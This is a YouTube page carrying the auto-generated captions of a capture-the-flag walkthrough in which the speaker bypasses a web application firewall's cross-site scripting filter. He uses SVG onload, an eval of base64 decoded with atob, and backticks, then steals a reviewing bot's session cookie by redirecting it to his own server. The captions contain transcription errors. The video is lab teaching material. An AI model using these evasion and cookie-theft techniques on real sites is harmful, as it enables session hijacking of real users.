All-Army CyberStakes! Cross-Site Scripting Filter Evasion

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everybody welcome back in the YouTube video showcasing all army cyber stakes or ACI CTF that was going on this past week I've been wanting to showcase some of these cool challenges there were a ton of fantastic ones I'm trying to get a lot of the tougher ones at least some of the more complex ones that I solved adalah way now before I burnout trying to record all this stuff but this challenge is called I've caught you now it's worth 250 points currently it's Friday the competition ends on Sunday so there might be a few more solves but at the time recording there are only 43 solves for this challenge so it says XSS or cross-site scripting is a thing of the past read all about it here and we're given a link so I will open that up in a web browser and it took a little bit to render that page which was weird but this is the cyber x web page it says there are five cool ways to protect your websites from hackers this looks kind of like a blog here featured posts you will never believe this flag we found it says when going headfirst and CTF everyone wants to find blah blah blah flags and help us out submit cool content to us okay so if I were to click on one of these I'll go to article zero here it says to fight back these companies deploy applications called a web application and then ellipses it says you're out of free articles please use an account with a cyber time subscription to read this article so if I try to click on any of these links here search for security or hacking or exploit cybercrime firewall CTFs it looks like they're all modifying this search URL here the search is the location that it's trying to go to with a argument or an HTTP variable yet that's passed in search and what we're actually looking for so going back to the page though this featured post here article 1 as the link says you'll never believe this flag we found we figured out one challenge you won't believe the flag we got find out below ok so that must be maybe we're a flag could be hidden but we do not have access to read that page there is a submit cool content to us location send us links to cool content we'll see if it is newsworthy like you I suppose we could give them a URL so based off of every thing that we've learned looks like there are web pages there are blogs on this site there's a location that we could submit a URL to visit and we aren't able to access some of the page some of the pages and some of the content on this website given the challenge description I'm assuming this is going to be a cross-site scripting attack where we need to be able to drive whoever validates or whoever checks in that submission page to review and access some of these pages that we cannot access so where could we control or where do we have an input that we could modify and make it do something sounds like we could at least kind of offer some input into the search blog functionality and the page is moving slowly for me so why is that I'll pause and see if it comes back ok no it seems to be stable but if I were to search for thing like the letter A or please subscribe it looks like it renders it out on the page so maybe we could do some things to actually get some cross-site scripting in there render some HTML ok that h1 doesn't seem to load for me so that kind of takes away some of the wind that we had but what else could we do h1 anything that's so weird that it does that we could search for like an image tag maybe if we do a image source equals nothing oh ok it says this page has been blocked by secure web and this is still on the web page this isn't this isn't our browser trying to tell us something it says secure wife detected that the uol parameter search contains dangerous data so this web request has been blocked for your protection ah ok so that must have triggered with the image source thing is it just the image tag that makes it whine yeah yeah so slash image slash I am is that gonna load for me okay so I am works it's just searching for IMG with an opening arrow and it'll whine for me secure wife detect URL parameter search contains dangerous data it's weird though because it includes the URL parameter itself in its response so if I did something strange with a URL parameter does it have to be searched that it has the weirdness or could it be could I could I also include something in here like it image source equals maybe could I could I do that or just I'll just use the image tag itself that seems to break it okay could I use that h1 tag that I just tried earlier h1 hello and code as part of the URL oh okay oh I ended code saying that allowed my bad h1 that's the end code that seems to do it so injection which is kind of peculiar well let's start to script this let's start to hammer this in a way that we could work with it and kind of be able to monitor and see everything that's happening what does the name of this challenge again I've caught you now so make directory I have caught you now let's hop over in there and let's start to script this with Python I have all of the other tabs open from some previous videos I've been recording I'm trying to get a lot of these out for you guys so let's import requests let's get this URL let's say URL equals just the base URL I don't need search in here so let's get a requests dot get URL I'll say r2 equal that I'll print out our our dot text and now let's try and run that page okay so we'll all return out for us to make things a little bit easier to see and work with I'm gonna use shift alt 2 to get a second tab or pain within sublime text and then I'm when I run this I have build view as a plug-in set up you could install package build view control shift P to access that and I will go ahead and mark this page as HTML so it's a little bit easier to read for us so let's try and trigger that bad page again let's say our parameters can equal a dictionary with something or our h1 anything that we just try to really are set to image so this is funky because the parameter name itself is where we can get our cross-site scripting kind of injection in but the value is what it's being used to trigger that laugh or that Web Application Firewall to actually have this the Web Application Firewall is actually made it insecure in itself because it is vulnerable to cross-site scripting so the value of this HTTP variable this get variable that's what's going to trigger the page but then using this parameter name itself we can inject that into the page so we'll specify params equals parameters we should just call that variable params so it makes more sense I guess so let's spit that out it says okay this page has been blocked by secure web secure ops detected URL parameter code h1 anything being properly rendered so we could we know that because there aren't any like ampersand LT or LD g T some know HTML escaped sequences are in there that contains dangerous data so this request has been blocked for your protection ok so it looks like our XSS payload let's make a variable for that our XSS payload could be let's use a long string in Python I wonder if that'll let us do some things h1 anything you anything and what I actually want to do is I want to print out the URL of this page so I can interact with it more so our URL or I can see in my browser how this actually loads so I'll copy that in slap it in and ok it looks like that renders it just fine this is currently trapped inside of a code block so let me try and end that code block and then it tries to have another one so I'll so it tries to close its original code block so I guess I'll add a new one in there just so the page doesn't do weird things now let's try to do some of our image source equals nonsense I can use double quotes because we're inside of these triple quotes and Python so if I have that and I do a little on error equals JavaScript alert one plus one so we know that'll evaluates that gets the forbidden okay so it seems sensitive on this image tag I didn't try just a straight script so we could try that script and end script alert one plus two doesn't matter also gets a forbidden okay but our h1 went through that's weird what can we get through hmm let's let's go to payload all the things let's go check out some of their options and ideas for cross-site scripting or XSS injection looks like they have a few options so typically a classic cross site scripting technique would grab a cookie a document dot cookie from really the end user maybe we could get that to work eventually but we can't seem to use these script tags what else could we do can't use script can't use script oh the internal and maybe it's replacing it no that's weird so image also has it wine does SVG onload let it work SVG Amla can we try an SVG payload let's try one of those spit that in pages taking a little bit of time to come back oh okay there he goes code SVG onload alert XSS what did it do to my quotes how come my single quotes aren't in there does this actually happen on the webpage oh no it does not it does not run that alert but it does a weird thing getting an SVG in there okay if I use the 1 + 2 does that actually trigger it that does okay so we have JavaScript somehow some way but we can't seem to use quotes for the single quote didn't work well a double quote work no that is also being scraped out okay what else are what are other options what can we do to get a string XSS or JavaScript string without quotes I feel like that's just shot in the dark but can you create a Java subscreen without single quotes or double quotes bla bla bla I've had to create strings without quotes for product as well we're delivering a suitable thing so they use string and they use forward slashes to get string does that work or we could do it just from the numbers let's try let's try both of those let's use string this guy here this contains no quotes let's try that Coffee that guy in this contains no quotes oh but it also removed our spaces what the heck so the string showed up but we don't have spaces that's gonna be annoying could we we could use we could get spaces in there if we were to use that from character code syntax let's try him paste that in as our little alert payload run that copy him put that on that page that also doesn't work why not alert strength oh it removes the periods oh my gosh how are we going to be able to do a document dot location if we don't have periods or the dots we can actually use dang okay will we at least learned a little bit of something we could use strings if we use these forward slashes this does cover anything else no that's all that's in that page I want to remove double quotes from string that doesn't work oh they use that here and payload all the things alert with backticks does that work can we use back ticks as a string hmm well maybe we could still pull can we use those how could we how could we escape this whole syntax without using periods and spaces alert eval eval might let us do some stuff ooh oh oh and we could probably like base64 encode JavaScript so I always forget this function if you're going to the console and you were to try and run like a table what is a table and BTO a those can get something into and out of base64 so please sub okay be Toa is to get it into base64 and 80 ob is to decode from base64 yeah okay so let's try to get our let's try to get another actual payload so let's say stager can actually equal this and let's get a real payload that can be another multi-line string and let's do alert hello this is me or whatever it doesn't matter as long as we have something with spaces and quotes we could eval the ATO be that's the one that we just that's the one that we just determined was right that be Toa yeah so ATO B is what we need and then if we use the forward slashes will that work well forward slashes work let's go ahead and base64 encode import base64 our payload be 64 encode that payload and let's set the payload to equal that so now it is base64 encoded and let me I think I'm in Python 2 again because the stupid sublime text will just split that in with the percent sign does that work ooh the page took it spit that in no unexpected token that thing do I have too many oh no because that do I have too many parentheses unexpected token closing parentheses could I use the back ticks that I saw as a technique ooh that worked okay oh so that that would essentially give us like everything that we need because now we're not working out of the like original filter or so we we could use spaces we could use quotes we could probably even use periods so now we have unfiltered JavaScript and we could perform a real cross-site scripting attack okay that is progress so what do we need to do well let's try and get someone's cookie let's do let's let's spin up a little server that could be accessible from the internet so a public box and let's just make a directory for XSS random name doesn't matter Python Tech M specify Python 3 quad 8 so that guy should exist he does great I see my request let's spin him one more time and let's try and modify our script to go to document dot location HTTP trondheim and org quad 8 as the port and let's include a document cookie does that work for us does he have a cookie if I run this I'll see myself go if I try and go to this location let me try that I'll spin this up I'll close out of this debugger here let's paste that in ok so that carried me over error response file not found whatever it doesn't need a file but it got all of the cookies that I had so my PHP session is in there if I were to go submit that ok stop I don't need that anymore I bring me back to the original server please yeah fine spin that one more time and let's go make sure you guys can see that without my face being in the way go ahead and submit that URL too the validator or whoever's gonna check that thanks we'll check it out in a few minutes please give us some time before trying again okay let's see if we ever get a request from him we do we do we get a session Oh perfect okay and that must be the cookie so I'm gonna use my edit this cookie manager let's search cookies for here can I add a new one can I add a new cookie please whatever let's not do it in the browser let's just let's just use our Python our Python sword the magic that we know within Python so now let's let's just call this like catch cookie dot pie and let's totally save a different one to be like get flag dot pie so we know that the session value looks like this because we just caught that with our JavaScript cross-site scripting cookie catcher so what we could do is use requests holy crap to get this URL let's say my cookies equals session set to that with a key and value pair let's say cookies equals cookies and let's just load the page print it out our texts hold a cow and okay it reads it just fine so can I get to that article one page that's the one that says it has a flag in it so let's get URL plus article one and spit that guy out oh yeah okay awesome awesome when going at first and CTFs everyone wants to come out with some cool flag after a truckload of effort we were rewarded with the text AC so there's our flag that's it that's what we did that's how we solve it that's fantastic so that was kind of cool I hope you guys really like that challenge the little catch cookie you needed to do some clever cross-site scripting stuff if you had tinkered around with this for more I actually did I spent a lot of time I think I spent like a couple hours on this one SVG I didn't end up using originally I actually did a body onload and I would use a new line to get my spaces in there and I actually I was even like changing the whole URL or the CSS and that page I'd be like I verify what can I actually read in can I make the background read how many characters can I use and I would slowly figure out okay these are the filters that are that are beating me up and how I needed to get around them so that eval base64 technique is really what I use to get out of the filter and be able to use strings periods up like double quotes and single quotes whatever I really needed to and I staged it all with Python and would just grab the URL so I could kind of go back and forth between troubleshooting how it looks on the page and hey if it's gonna actually render that JavaScript in my browser so that's that that was that challenge but boy I hope that was cool I hope you guys learned a little bit of some tricks in there for cross-site scripting you could also do a little XML like HTTP request or xhr and that's even the solution that I had i'll go find and show you my script huh I don't know I'm still talking about this like a I'm not gonna show you what is the name of this challenge why do I forget every single time I've caught you now that's what it is API yeah I actually used xhr to go ahead and grab the article and then send it to myself how would you document location after but getting the cookie will work just as well because you're going to act as that user so you could see the style sheets that I was saying I did crazy stuff with that's it but some people might have had the ear ran into the issue where you're getting a cores error or a cross origin policy or like you have to be remaining on the website itself you can't request out to an external site with xhr that's correct so when we were doing and on location document location will not have that Kors problem but if you were to use xhr or a new xmlhttprequest to reach out to your external server where you're gonna grab the flag from well then it's gonna say hey you're not allowed to leave the site or cross-origin policy is just not letting it have that so don't use do use dr. dot location you've got to use document location to go ahead and grab that cookie or grab the text that you really want to end up seeing so that's that XML HTTP response is kind of cool a request because you can do a lot of drive-by downloading and access any other page you want but if you are catching something externally you have to use document location or you're sending something externally you'd have to use that in this case at least that's what I've seen I'm happy to hear if you guys got anything else but that was that challenge Wow Wow thank you guys so much for watching I hope you guys enjoyed this video I hope you learned something cool some neat tricks with cross-site scripting a lot of good resources out there between payload all the things and just some quick googling and researching just trying to do clever tricks and techniques so if you like this video please do hit that like button if you didn't like it hit the dislike button twice so I know how much you hated it leave a comment type some things in the box and hit and the Enter key YouTube algorithm stuff please don't hesitate to subscribe hit that Bell icon I don't know why you would ever hit a bell personally what did they do to you but hey I hate I hate doing I'm so bad at out dressed just get just get off the video see you on LinkedIn Twitter Facebook and discord patreon pic etcetera [Music] [Music] [Music]

Info

Channel: John Hammond

Views: 41,793

Rating: undefined out of 5

Keywords:

Id: HbzI3ubOos0

Channel Id: undefined

Length: 26min 3sec (1563 seconds)

Published: Mon May 18 2020